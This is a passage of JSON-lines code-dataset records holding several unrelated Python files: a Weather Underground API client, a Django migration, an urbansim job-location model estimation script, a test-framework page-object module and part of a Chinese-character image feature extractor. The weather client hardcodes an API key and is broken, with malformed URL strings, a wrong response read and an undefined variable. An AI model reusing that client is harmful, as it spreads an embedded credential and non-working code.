\"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n location = parsed_json['current_observation']['display_location.full']\n temp_f = parsed_json['current_observation']['temp_f']\n print('Current Temperature in %s is %s' % (location, temp_f))\n r.close()\n\n\n# class MultidayForecast: # 10 day forecast for that location\n#\n# def multiday_forecast(zipcode):\n# r = requests.get(\"\"\"\n# http://api.wunderground.com/api/5f8146a5f07d654c/forecast10day/q/\"+ zipcode +\".json\n# \"\"\")\n# json_string = r.read()\n# parsed_json = json.loads(json_string)\n#\n# for \"period\" in parsed_json:\n\n\n\nclass SunSchedule: # Sunrise and sunset times\n\n def sun_actions(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/astronomy/q/\"+ zipcode +\".json\n \"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n sunrise_hour = parsed_json['moon_phase']['sunrise.hour']\n sunrise_minute = parsed_json['moon_phase']['sunrise.minute']\n sunset_minute = parsed_json['moon_phase']['sunset.hour']\n sunset_minute = parsed_json['moon_phase']['sunset.minute']\n print('Sunrise is at: %s:%s' % (sunrise_hour, sunrise_minute))\n print('Sunset is at: %s:%s' % (sunset_hour, sunset_minute))\n r.close()\n\n\nclass WeatherAlert: # Any current weather alerts\n\n def alerts(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/alerts/q/\"+ zipcode +\".json\n \"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n alert_description = parsed_json['alerts']['description']\n alert_message = parsed_json['alerts']['message']\n if alert_description:\n print('There is currently a %s alert for your area: ' % alert_description)\n print(alert_message)\n else:\n print('There is currently no weather alert for your area')\n r.close()\n\n\n\nclass ActiveHurricane: # A list of all active hurricanes (anywhere)\n\n def hurricane_checker(zipcode):\n r = requests.get(\"\"\"\n http://api.wunderground.com/api/5f8146a5f07d654c/currenthurricane/view.json\n \"\"\")\n json_string = r.read()\n parsed_json = json.loads(json_string)\n name = parsed_json['storminfo']['stormName_Nice']\n lat = parsed_json['Current']['lat']\n lon = parsed_json['Current']['lon']\n category = parsed_json['Current']['SaffirSimpsonCategory']\n print(\"\"\"Currently %s is located at %s lattitude, %s longitude and\n is a category %s hurricane\"\"\" % (name, lat, lon, category))\n r.close()\n", "sub_path": "api_calls.py", "file_name": "api_calls.py", "file_ext": "py", "file_size_in_byte": 3119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 14, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "613933810", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('filmfestival', '0009_auto_20150607_2303'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Day',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateField()),\n ],\n ),\n migrations.CreateModel(\n name='Program',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Screening',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('day', models.ForeignKey(to='filmfestival.Program')),\n ('film', models.ForeignKey(to='filmfestival.Film')),\n ],\n ),\n migrations.AddField(\n model_name='day',\n name='program',\n field=models.ForeignKey(to='filmfestival.Program'),\n ),\n ]\n", "sub_path": "filmfestival/migrations/0010_auto_20150610_1341.py", "file_name": "0010_auto_20150610_1341.py", "file_ext": "py", "file_size_in_byte": 1327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "168111732", "text": "#!/usr/bin/env python\n# coding: utf-8\nfrom urbansim.models.regression import RegressionModel\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport orca\nfrom urbansim.utils import misc\nimport sys\nimport time\nfrom tqdm import tqdm\nimport time\nimport yaml\n\nfrom dcm_ard_libs import minimize, neglog_DCM\nfrom fit_large_MNL_LCM import run_elcm_large_MNL\nfrom urbansim_templates import modelmanager as mm\nmm.initialize('configs/elcm_2050')\n\n# from guppy import hpy; h=hpy()\n# import pymrmr\n\n# suppress sklearn warnings\ndef warn(*args, **kwargs):\n pass\n\nos.chdir(\"/home/da/semcog_urbansim\")\n\n# import utils\n# data_path = r\"/home/da/share/U_RDF2050/model_inputs/base_hdf\"\ndata_path = r'/home/da/share/urbansim/RDF2050/model_inputs/base_hdf'\nhdf_list = [\n (data_path + \"/\" + f)\n for f in os.listdir(data_path)\n if (\"forecast_data_input\" in f) & (f[-3:] == \".h5\")\n]\nhdf_last = max(hdf_list, key=os.path.getctime)\nhdf = pd.HDFStore(hdf_last, \"r\")\n# hdf = pd.HDFStore(data_path + \"/\" +\"forecast_data_input_091422.h5\", \"r\")\nprint(\"HDF data: \", hdf_last)\n\nvar_validation_list = [\n (data_path + \"/\" + f)\n for f in os.listdir(data_path)\n if (\"variable_validation\" in f) & (f[-5:] == \".yaml\")\n]\nvar_validation_last = max(var_validation_list, key=os.path.getctime)\nwith open(var_validation_last, \"r\") as f:\n vars_config = yaml.load(f, Loader=yaml.FullLoader)\nvalid_b_vars = vars_config[\"buildings\"][\"valid variables\"]\nvalid_job_vars = vars_config[\"jobs\"][\"valid variables\"]\n\n\ndef apply_filter_query(df, filters=None):\n if filters:\n if isinstance(filters, str):\n query = filters\n else:\n query = \" and \".join(filters)\n return df.query(query)\n else:\n return df\n\n\ndef load_hlcm_df(jobs, buildings, job_var, b_var):\n jobs = jobs.to_frame(job_var)\n b = buildings.to_frame(b_var)\n return jobs, b\n\ndef columns_in_vars(jobs, buildings, vars):\n job_columns, b_columns = [], []\n for varname in vars:\n if varname in jobs.columns:\n job_columns.append(varname.strip())\n elif varname in buildings.columns:\n b_columns.append(varname.strip())\n else:\n print(varname, \" not found in both jobs and buildings table\")\n return job_columns, b_columns\n \n\ndef get_interaction_vars( df, varname):\n \"\"\"Get interaction variables from variable name\n\n Args:\n varname (string): name of the interaction variable\n \"\"\"\n if \":\" in varname:\n var1, var2 = varname.split(\":\")\n var1, var2 = var1.strip(), var2.strip()\n return (df[var1] * df[var2]).values.reshape(-1, 1)\n else:\n return df[varname].values.reshape(-1, 1)\n\n\nused_vars = pd.read_excel(\"/home/da/share/urbansim/RDF2050/model_estimation/configs_elcm_large_area_sector.xlsx\", sheet_name=1)\nv1 = used_vars[~used_vars[\"variables 1\"].isna()][\"variables 1\"].unique()\nv2 = used_vars[~used_vars[\"Variables 2\"].isna()][\"Variables 2\"].unique()\nvars_to_use = np.array(list(set(v1.tolist()).union(v2.tolist())))\n# vars_to_use = used_vars[0].unique()\n\n# config\nchoice_column = \"building_id\"\njob_filter_columns = [\"building_id\", \"slid\", \"home_based_status\"]\nb_filter_columns = [\"large_area_id\", \"non_residential_sqft\", \"vacant_job_spaces\"]\n# load variables\nRELOAD = False\nif RELOAD:\n # from notebooks.models_test import *\n import models\n buildings = orca.get_table(\"buildings\")\n jobs = orca.get_table(\"jobs\")\n orca.add_injectable('year', 2020)\n orca.run([\"build_networks_2050\"])\n orca.run([\"neighborhood_vars\"])\n # TODO: get vars from vars list from last forecast\n job_columns, b_columns = columns_in_vars(jobs, buildings, vars_to_use)\n\n job_var = job_columns + job_filter_columns\n b_var = b_columns + b_filter_columns\n job_region, b_region = load_hlcm_df(jobs, buildings, job_var, b_var)\n job_region.to_csv('jobs.csv')\n b_region.to_csv('b_elcm.csv')\nelse:\n job_region = pd.read_csv('jobs.csv', index_col=0)\n b_region = pd.read_csv('b_elcm.csv', index_col=0)\n orca.add_table('jobs', job_region)\n orca.add_table('buildings', b_region)\n\ndef estimation(SLID):\n job_sample_size = 1000\n estimation_sample_size = 80\n # sampling jobs\n # from the new move-ins, last 5-10 years\n # weighted by mcd_quota\n job = job_region[job_region.slid == SLID]\n job = job[job.building_id > 1]\n job = job[job.home_based_status == 0]\n # if total number of job is less than job_sample_size \n job_sample_size = min(job_sample_size, job.shape[0])\n job = job.sample(job_sample_size)\n job = job.reset_index()\n job = job.fillna(0)\n # sampling b\n # sample buildings from the chosen job's buildings list\n bid_sample_pool = b_region[b_region.large_area_id == SLID % 1000].index\n sampled_b_id = []\n for _ in range(estimation_sample_size-1):\n for j in job.building_id:\n sampled_b_id.append(np.random.choice(bid_sample_pool[bid_sample_pool!=j]))\n\n b_sample = b_region.loc[sampled_b_id]\n b_sample = pd.concat([b_region.loc[job.building_id], b_sample])\n b_sample = b_sample.reset_index()\n b_sample = b_sample.fillna(0)\n # remove unnecessary col in jobs\n job = job[[col for col in job.columns if col not in job_filter_columns+[\"job_id\"]]]\n # remove unnecessary col in buildings\n b_sample = b_sample[[col for col in b_sample.columns if col not in b_filter_columns]]\n\n X_df = pd.concat(\n [pd.concat([job]*estimation_sample_size).reset_index(drop=True), b_sample], axis=1)\n # Y: 1 for the building picked\n # Y = X_df.building_id.isin(picked_bid).astype(int).values\n # Y: set first job_sample_size item 1\n Y = np.zeros((job_sample_size*estimation_sample_size,1), dtype=int)\n Y[:job_sample_size,0] = 1\n # remove extra cols\n X_df = X_df[[col for col in X_df.columns if col not in ['building_id']]]\n # create interaction variables\n newX_cols_name = vars_to_use\n X_wiv = np.array([])\n for varname in newX_cols_name:\n if X_wiv.size > 0:\n X_wiv = np.concatenate((X_wiv, get_interaction_vars(X_df, varname)), axis=1)\n else:\n X_wiv = get_interaction_vars(X_df, varname)\n\n # df to ndarray\n X = X_wiv\n\n # col index with 0 variation\n used_val = np.arange(X.shape[1])[np.std(X, axis=0, dtype=np.float64) > 0]\n unused_val = np.array([x for x in range(X.shape[1]) if x not in used_val])\n\n # only keep variables with variation\n X = X[:, np.std(X, axis=0, dtype=np.float64) > 0]\n # standardize X\n X = (X - np.mean(X, axis=0)) / np.std(X, axis=0, dtype=np.float64)\n # shuffle X\n shuffled_index = np.arange(Y.size)\n np.random.shuffle(shuffled_index)\n X = X[shuffled_index, :].astype(float)\n Y = Y[shuffled_index].reshape(-1, 1)\n # TODO: Y_onehot\n Y_onehot = Y\n # availablechoice is 1\n available_choice = np.ones((X.shape[0], 1))\n\n # theta: m x 1\n theta = np.zeros((X.shape[1], 1))\n\n # dtypes conversion\n X = {0:X, 1:X}\n theta = {0:theta, 1:theta}\n Y = 1 - Y # 0 means picked, 1 means not picked\n Y_onehot = np.concatenate((Y_onehot, 1-Y_onehot), axis=1)\n available_choice = np.concatenate((available_choice, available_choice), axis=1)\n\n t0 = time.time()\n theta_optim_full = minimize(theta, neglog_DCM, -3000, X, Y, Y_onehot, available_choice)\n t1 = time.time()\n print(\"minimizer finished in \", t1-t0)\n\n # exporting theta\n out_theta = pd.DataFrame(theta_optim_full[0], columns=['theta'])\n out_theta.index = newX_cols_name[used_val]\n out_theta = out_theta.loc[out_theta.theta.abs().sort_values(ascending=False).index]\n out_theta.to_csv('./configs/elcm_2050/thetas/out_theta_job_%s_%s.txt' % (SLID, estimation_sample_size))\n\n print(\"Warning: variables with 0 variation\")\n print(newX_cols_name[unused_val.tolist()])\n print('ARD-DCM done')\n\nif __name__ == \"__main__\":\n # run_elcm_large_MNL(job_region, b_region, 1100115, 10)\n slid_list = job_region['slid'].unique().tolist()\n for slid in slid_list:\n # if selected sector_id, skip it and use job scaling model instead\n sector_id = slid // 100000\n if sector_id in [1, 7, 12, 13, 15, 18]:\n continue\n # skip slid which have very small sample size\n if slid in [1100115, 1100147]:\n continue\n # estimation(slid)\n run_elcm_large_MNL(slid, 20)\n # estimation(500125)\n # run_elcm_large_MNL(job_region, b_region, 500125, 30)\n # slid which have failed LargeMNL run due to LinAlgError:\n # [500115, 500093, 1100093, 1500115]", "sub_path": "ELCM_estimation.py", "file_name": "ELCM_estimation.py", "file_ext": "py", "file_size_in_byte": 8531, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "urbansim_templates.modelmanager.initialize", "line_number": 19, "usage_type": "call"}, {"api_name": "urbansim_templates.modelmanager", "line_number": 19, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.HDFStore", "line_number": 39, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 50, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "orca.get_table", "line_number": 112, "usage_type": "call"}, {"api_name": "orca.get_table", "line_number": 113, "usage_type": "call"}, {"api_name": "orca.add_injectable", "line_number": 114, "usage_type": "call"}, {"api_name": "orca.run", "line_number": 115, "usage_type": "call"}, {"api_name": "orca.run", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 127, "usage_type": "call"}, {"api_name": "orca.add_table", "line_number": 128, "usage_type": "call"}, {"api_name": "orca.add_table", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 151, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 162, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 184, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 188, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 190, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 190, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 209, "usage_type": "call"}, {"api_name": "time.time", "line_number": 211, "usage_type": "call"}, {"api_name": "dcm_ard_libs.minimize", "line_number": 212, "usage_type": "call"}, {"api_name": "dcm_ard_libs.neglog_DCM", "line_number": 212, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 213, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 217, "usage_type": "call"}, {"api_name": "fit_large_MNL_LCM.run_elcm_large_MNL", "line_number": 238, "usage_type": "call"}]} +{"seq_id": "9202642", "text": "\"\"\"Methods for dealing with page object modules\nPage object are modules located inside /pages/ directory\n\"\"\"\nimport importlib\nimport os\nimport types\nimport inspect\n\nfrom golem.core import utils, file_manager\n\n\ndef page_exists(root_path, project, full_page_name):\n \"\"\"Page object exists.\n full_page_name must be dot path from the /project/pages/ \n directory\n Example: \n testdir/projects/project1/pages/modulex/pagex.py\n page_exists(root_path, 'project1', 'modulex.pagex') -> True\n \"\"\"\n page_rel_path = os.sep.join(full_page_name.split('.'))\n path = os.path.join(root_path, 'projects', project, 'pages',\n page_rel_path + '.py')\n return os.path.isfile(path)\n\n\ndef get_page_object_content(project, full_page_name):\n \"\"\"Parses a page object and returns it's contents\n in dictionary format.\n \n Page Object Contents:\n functions : list of functions\n elements : web elements defined inside page\n import lines : list of import lines\n source code : source code as string\n\n Each function contains:\n function_name\n description\n arguments\n code\n\n Each element contains:\n element_selector\n element_value\n element_display_name\n element_full_name\n \"\"\"\n po_data = {\n 'functions': [],\n 'elements': [],\n 'import_lines': [],\n 'code_lines': [],\n 'source_code': ''\n }\n _ = 'projects.{0}.pages.{1}'.format(project, full_page_name)\n modulex = importlib.import_module(_)\n # get all the names of the module,\n # ignoring the ones starting with '_'\n variable_list = [i for i in dir(modulex) if not i.startswith(\"_\")]\n \n # get all the import lines in a list\n try:\n po_data['source_code'] = inspect.getsource(modulex)\n except:\n print('Parsing of {} failed'.format(full_page_name))\n po_data['code_lines'] = po_data['source_code'].split('\\n')\n for line in po_data['code_lines']:\n if 'import' in line:\n po_data['import_lines'].append(line)\n for var_name in variable_list:\n variable = getattr(modulex, var_name)\n if isinstance(variable, types.FunctionType):\n # this is a function\n new_function = {\n 'function_name': var_name,\n 'full_function_name': ''.join([full_page_name, '.', var_name]),\n 'description': inspect.getdoc(variable),\n 'arguments': list(inspect.signature(variable).parameters),\n 'code': inspect.getsource(variable)\n }\n po_data['functions'].append(new_function)\n elif isinstance(variable, tuple):\n # this is a web element tuple\n if len(variable) >= 2:\n element_display_name = ''\n if len(variable) >= 3:\n element_display_name = variable[2]\n new_element = {\n 'element_name': var_name,\n 'element_selector': variable[0],\n 'element_value': variable[1],\n 'element_display_name': element_display_name,\n 'element_full_name': ''.join([full_page_name, '.', var_name])\n }\n po_data['elements'].append(new_element)\n # elif isinstance(variable, types.ModuleType):\n # pass\n else:\n pass\n # print('ERROR', variable)\n return po_data\n\n\ndef get_page_object_code(path):\n \"\"\"Get the page object code as string given the full path\n to the python file\"\"\"\n code = ''\n if os.path.isfile(path):\n with open(path) as ff:\n code = ff.read()\n return code\n\n\ndef save_page_object(root_path, project, full_page_name, elements,\n functions, import_lines):\n \"\"\"Save Page Object contents to file.\n full_page_name must be a dot path starting from /project/pages/\n directory, (i.e.: 'module.sub_module.page_name_01')\n \"\"\"\n def format_element_string(name, selector, value, display_name):\n formatted = (\"\\n\\n{0} = ('{1}', \\'{2}\\', '{3}')\"\n .format(element['name'], element['selector'],\n element['value'], element['display_name'])\n )\n return formatted\n\n page_name, parents = utils.separate_file_from_parents(full_page_name)\n page_object_path = os.path.join(root_path, 'projects', project, 'pages',\n os.sep.join(parents), '{}.py'.format(page_name))\n with open(page_object_path, 'w', encoding='utf-8') as po_file:\n for line in import_lines:\n po_file.write(\"{}\\n\".format(line))\n for element in elements:\n # replace the spaces with underlines of the element name\n if ' ' in element['name']:\n element['name'] = element['name'].replace(' ', '_')\n # escape quote characters\n element['value'] = element['value'].replace('\"', '\\\\\"').replace(\"'\", \"\\\\'\")\n if not element['display_name']:\n element['display_name'] = element['name']\n formatted = format_element_string(element['name'],\n element['selector'],\n element['value'],\n element['display_name'])\n po_file.write(formatted)\n for func in functions:\n po_file.write('\\n\\n' + func)\n\n\ndef save_page_object_code(root_path, project, full_page_name, content):\n \"\"\"Save a Page Object given it's full code as a string.\n full_page_name must be a dot path starting from /project/pages/\n directory.\n content must be the file content as string\n \"\"\"\n page_name, parents = utils.separate_file_from_parents(full_page_name)\n page_path = os.path.join(root_path, 'projects', project, 'pages',\n os.sep.join(parents), '{}.py'.format(page_name))\n with open(page_path, 'w', encoding='utf-8') as po_file:\n po_file.write(content)\n\n\ndef new_page_object(root_path, project, parents, page_name):\n \"\"\"Create a new page object.\n Parents is a list of directories and subdirectories where the\n page should be stored.\n If add_parents is True, the parent directories will be added\n if they do not exist.\"\"\"\n errors = []\n base_path = os.path.join(root_path, 'projects', project, 'pages')\n full_path = os.path.join(base_path, os.sep.join(parents))\n filepath = os.path.join(full_path, '{}.py'.format(page_name))\n if os.path.isfile(filepath):\n errors.append('A page file with that name already exists')\n if not errors:\n if not os.path.isdir(full_path):\n for parent in parents:\n base_path = os.path.join(base_path, parent)\n file_manager.create_directory(path=base_path,\n add_init=True)\n with open(filepath, 'w') as po_file:\n po_file.write('')\n return errors\n\n\ndef generate_page_path(root_path, project, full_page_name):\n \"\"\"Generates a path to a page object python file\n Example\":\n generate_page_path('user/testdir', 'project1, 'module1.page1')\n -> 'user/testdir/projects/project1/pages/module1/page1.py'\n \"\"\"\n page_name, parents = utils.separate_file_from_parents(full_page_name)\n page_path = os.path.join(root_path, 'projects', project, 'pages',\n os.sep.join(parents), '{}.py'.format(page_name))\n return page_path\n\n\ndef pages_base_dir(root_path, project):\n \"\"\"Generate base dir for pages.\n i.e.: /projets//pages/\n \"\"\"\n return os.path.join(root_path, 'projects', project, 'pages')\n", "sub_path": "golem/core/page_object.py", "file_name": "page_object.py", "file_ext": "py", "file_size_in_byte": 7753, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.sep.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 56, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 63, "usage_type": "call"}, {"api_name": "types.FunctionType", "line_number": 72, "usage_type": "attribute"}, {"api_name": "inspect.getdoc", "line_number": 77, "usage_type": "call"}, {"api_name": "inspect.signature", "line_number": 78, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "golem.core.utils.separate_file_from_parents", "line_number": 127, "usage_type": "call"}, {"api_name": "golem.core.utils", "line_number": 127, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 129, "usage_type": "attribute"}, {"api_name": "golem.core.utils.separate_file_from_parents", "line_number": 156, "usage_type": "call"}, {"api_name": "golem.core.utils", "line_number": 156, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 170, "usage_type": "call"}, {"api_name": "os.path", "line_number": 170, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 171, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "golem.core.file_manager.create_directory", "line_number": 179, "usage_type": "call"}, {"api_name": "golem.core.file_manager", "line_number": 179, "usage_type": "name"}, {"api_name": "golem.core.utils.separate_file_from_parents", "line_number": 192, "usage_type": "call"}, {"api_name": "golem.core.utils", "line_number": 192, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.sep.join", "line_number": 194, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 194, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "533323600", "text": "#! /usr/bin/python3\n\"\"\"\n/**\n *\n * Date : 29 / 11 / 2017\n *\n * Nom : Li\n * Prenom : Xiang\n *\n * Email : xiangfr007@gmail.com\n *\n * Remarques :\t\n * \t\t\t\n */\n\"\"\"\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom numpy import median\nimport sys\n\nall_path = \"../chinese_characters_train\"\ntest_path = \"../chinese_test\"\nresize_wh = 100\ndecalage = 32\nfilter_row_col = 0.2\nfilter_transformation = 40\n\n# return array[resize_wh][resize_wh]\ndef fill_image_to_resize_wh(image):\n\tbase_img = [[255 for col in range(0,resize_wh)] for row in range(0,resize_wh)]\n\tbase_img = np.array(base_img)\n\tfill_img = np.array(image)\n\tfor i in range(0,fill_img.shape[0]):\n\t\tfor j in range(0,fill_img.shape[1]):\n\t\t\tbase_img[i][j] = fill_img[i][j]\n\treturn base_img\n\n# return a photo\n# zoom the photo to (?,resize_wh) or (resize_wh,?)\ndef zoom_image(image):\n\timg_array = np.array(image)\n\tx = img_array.shape[0]\n\ty = img_array.shape[1]\n\tif(x > y):\n\t\trate = resize_wh/x\n\t\ty = int(y*rate)\n\t\treturn image.resize((y,resize_wh))\n\telse:\n\t\trate = resize_wh/y\n\t\tx = int(x*rate)\n\t\treturn image.resize((resize_wh,x))\n\n# return a photo\ndef get_image_of_character(image,average):\n\timg_array = np.array(image)\n\tx = img_array.shape[0]\n\ty = img_array.shape[1]\n\txx = 0;\n\tyy = 0;\n\t#trouver le point noir le plus (haut,gauche) et celui le plus (bas,droite)\n\t#find two black point that locate (up,left) and (bottom,right)\n\tfor i in range(0,img_array.shape[0]):\n\t\tfor j in range(0,img_array.shape[1]):\n\t\t\tif(img_array[i][j] < average):\n\t\t\t\tif(i < x):\n\t\t\t\t\tx = i\n\t\t\t\tif(j < y):\n\t\t\t\t\ty = j\n\t\t\t\tif(i > xx):\n\t\t\t\t\txx = i\n\t\t\t\tif(j > yy):\n\t\t\t\t\tyy = j\n\treturn image.crop((y,x,yy,xx))\n\n#return the average gray of a photo\ndef get_average(image):\n\treturn median(image) - decalage\n\n#return the list[10] (col = False / True)\ndef get_row_col_transformation(image,average,col_flag):\n\timg_array = np.array(image)\n\tlist10 = [ 0 for i in range(10)]\n\tfor i in range(0,img_array.shape[0]):\n\t\tflag = 0\n\t\ttotal = 0\n\t\tfor j in range(0,img_array.shape[1]):\n\t\t\tnow = img_array[i][j]\n\t\t\tif(col_flag == True):\n\t\t\t\tnow = img_array[j][i]\n\t\t\tif(now < average):\n\t\t\t\tif(flag == 0):\n\t\t\t\t\ttotal += 1\n\t\t\t\t\tflag = 1\n\t\t\telse:\n\t\t\t\tif(flag== 1):\n\t\t\t\t\ttotal += 1\n\t\t\t\t\tflag = 0\n\t\tlist10[int(i/10)] += total\n\treturn list10\n\n#return a list[21] and string of ahash\ndef get_feature_image(image):\n\timage = image.convert(\"L\")\t\n\taverage = 